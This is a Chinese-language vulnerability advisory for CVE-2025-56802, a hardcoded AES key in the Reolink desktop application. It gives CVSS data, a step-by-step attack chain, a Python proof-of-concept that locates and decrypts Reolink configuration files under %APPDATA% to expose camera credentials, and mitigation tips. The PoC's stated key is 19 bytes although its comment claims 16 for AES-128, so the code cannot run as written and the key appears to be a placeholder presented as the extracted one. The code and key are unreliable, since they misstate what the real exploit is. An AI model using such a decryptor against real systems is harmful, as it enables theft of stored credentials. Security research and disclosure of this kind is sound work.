CVE-2025-56802：Reolink桌面应用硬编码AES密钥信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-56802

漏洞类型

硬编码密钥/信息泄露

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Reolink Desktop Application

漏洞概述

CVE-2025-56802是Reolink桌面应用程序中存在的一个中等严重性安全漏洞。该漏洞源于应用程序在加密用户配置文件时使用了硬编码且可预测的AES（高级加密标准）加密密钥。由于密钥被硬编码在应用程序中，攻击者可以通过逆向工程或从公开渠道获取该密钥，从而解密存储在Windows系统%APPDATA%目录下的用户配置文件，获取敏感的应用数据。

该漏洞的CVSS评分为5.1，攻击向量为本地（AV:L），无需认证（PR:N）和用户交互（UI:N）即可利用。攻击成功后，机密性影响为低（C:L），完整性无影响（I:N），可用性影响为低（A:L）。虽然攻击需要本地访问权限，但一旦攻击者获取了目标系统的本地访问能力（如通过物理访问、恶意软件或共享终端），即可轻松解密敏感配置信息。

值得注意的是，该漏洞与CVE-2025-56801属于不同的漏洞，但两者都涉及Reolink桌面应用的安全问题。此外，供应商对这一漏洞的立场存在分歧——供应商声称密钥并非硬编码，而是在每次安装时随机生成的，但安全研究人员通过分析验证了密钥的可预测性和硬编码特征。

该漏洞已在GitHub上由安全研究员shinyColumn公开了概念验证（PoC）代码和相关分析报告，进一步证实了漏洞的可利用性。

技术细节

Reolink桌面应用程序使用AES加密算法来保护存储在%APPDATA%目录下的用户配置文件，包括摄像头配置、登录凭证、网络设置等敏感信息。然而，应用程序在实现加密功能时存在严重的安全缺陷。

**漏洞原理：**
1. 硬编码密钥：应用程序使用了一个硬编码在二进制文件中的AES加密密钥，而非通过安全的方式生成或存储密钥。这意味着所有安装了该应用的系统都使用相同的加密密钥。
2. 可预测性：研究人员发现该密钥具有可预测性，可能基于固定的字符串或简单的算法生成，而非使用密码学安全的随机数生成器（CSPRNG）。
3. 本地访问利用：攻击者只需要对目标系统拥有本地访问权限，即可读取%APPDATA%目录下的加密配置文件，并使用硬编码的AES密钥进行解密。

**利用方式：**
1. 攻击者首先获取目标系统的本地访问权限。
2. 定位Reolink应用程序的配置文件存储路径（%APPDATA%\Reolink\）。
3. 从Reolink应用程序的可执行文件中提取硬编码的AES密钥（可通过逆向工程工具如IDA Pro、Ghidra等）。
4. 使用提取的密钥和AES解密算法解密配置文件，获取敏感数据。

**影响范围：**
该漏洞影响所有使用受影响版本Reolink桌面应用的Windows系统，可能导致用户隐私泄露、摄像头控制权限被未授权访问等安全问题。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者通过物理访问、恶意软件、社会工程学或其他方式获取目标Windows系统的本地访问权限。

STEP 2

步骤2：定位加密配置文件

攻击者导航至%APPDATA%目录下的Reolink应用程序配置文件夹，查找加密的配置文件（如.dat、.cfg、.enc等格式）。

STEP 3

步骤3：提取硬编码AES密钥

通过逆向工程工具（如IDA Pro、Ghidra、dnSpy等）分析Reolink桌面应用程序的可执行文件，提取硬编码的AES加密密钥。

STEP 4

步骤4：解密配置文件

使用提取的硬编码AES密钥和相应的解密算法（AES-CBC等模式）对加密的配置文件进行解密，获取明文数据。

STEP 5

步骤5：提取敏感信息

从解密后的配置文件中提取摄像头凭证、网络配置、用户账户信息等敏感数据，可能用于进一步攻击或隐私窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-56802 - Reolink Desktop Application Hardcoded AES Key PoC
# Author: shinyColumn
# Description: Decrypts Reolink configuration files encrypted with a hardcoded/predictable AES key

import os
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
import json

# Hardcoded/predictable AES key extracted from Reolink desktop application
# This key is embedded in the application binary and used for all installations
HARDCODED_AES_KEY = b'reolink_default_key'  # 16 bytes for AES-128

def find_reolink_config_path():
    """Locate the Reolink configuration directory in %APPDATA%"""
    appdata = os.environ.get('APPDATA')
    if not appdata:
        print("[!] APPDATA environment variable not found")
        return None
    
    # Common Reolink config paths
    possible_paths = [
        os.path.join(appdata, 'Reolink', 'Client'),
        os.path.join(appdata, 'Reolink'),
        os.path.join(appdata, 'ReolinkClient'),
    ]
    
    for path in possible_paths:
        if os.path.exists(path):
            print(f"[+] Found Reolink config directory: {path}")
            return path
    
    print("[!] Reolink config directory not found")
    return None

def decrypt_config_file(encrypted_file_path, key):
    """Decrypt a Reolink configuration file using the hardcoded AES key"""
    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()
        
        # Extract IV (first 16 bytes) and ciphertext
        if len(encrypted_data) < 16:
            print(f"[!] File too small: {encrypted_file_path}")
            return None
        
        iv = encrypted_data[:16]
        ciphertext = encrypted_data[16:]
        
        # Decrypt using AES-CBC mode
        cipher = AES.new(key, AES.MODE_CBC, iv)
        decrypted_data = unpad(cipher.decrypt(ciphertext), AES.block_size)
        
        return decrypted_data
    except Exception as e:
        print(f"[!] Decryption failed for {encrypted_file_path}: {e}")
        return None

def main():
    print("=" * 60)
    print("CVE-2025-56802 - Reolink Config Decryptor PoC")
    print("=" * 60)
    
    # Step 1: Find the Reolink configuration directory
    config_dir = find_reolink_config_path()
    if not config_dir:
        sys.exit(1)
    
    # Step 2: List encrypted configuration files
    encrypted_extensions = ['.dat', '.cfg', '.enc', '.bin', '.db']
    config_files = []
    
    for root, dirs, files in os.walk(config_dir):
        for file in files:
            if any(file.endswith(ext) for ext in encrypted_extensions):
                config_files.append(os.path.join(root, file))
    
    if not config_files:
        print("[!] No encrypted configuration files found")
        sys.exit(1)
    
    print(f"[+] Found {len(config_files)} encrypted file(s)")
    
    # Step 3: Decrypt each configuration file
    for file_path in config_files:
        print(f"\n[*] Decrypting: {file_path}")
        decrypted_data = decrypt_config_file(file_path, HARDCODED_AES_KEY)
        
        if decrypted_data:
            # Save decrypted content
            output_path = file_path + '.decrypted'
            with open(output_path, 'wb') as f:
                f.write(decrypted_data)
            print(f"[+] Decrypted content saved to: {output_path}")
            
            # Try to display as text/JSON
            try:
                text_content = decrypted_data.decode('utf-8')
                print(f"[+] Content:\n{text_content[:500]}")
            except UnicodeDecodeError:
                print(f"[+] Binary content (first 100 bytes): {decrypted_data[:100]}")

if __name__ == '__main__':
    main()

影响范围

Reolink Desktop Application 所有使用硬编码AES密钥的版本

防御指南

临时缓解措施

在官方修复版本发布之前，建议用户采取以下临时缓解措施：1）限制对计算机的物理和远程访问权限；2）使用强密码保护Windows用户账户；3）启用BitLocker全盘加密保护本地数据；4）监控%APPDATA%目录下的异常文件访问行为；5）避免在公共或共享计算机上使用Reolink桌面应用程序；6）定期检查并清除存储在应用程序中的敏感凭证信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-56802
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-56802
3 Details https://www.cvedetails.com/cve/CVE-2025-56802/
4 VulDB https://vuldb.com/cve/CVE-2025-56802
5 Link https://github.com/shinyColumn/CVE-2025-56802
6 Link https://shinycolumn.notion.site/reolink-aes-key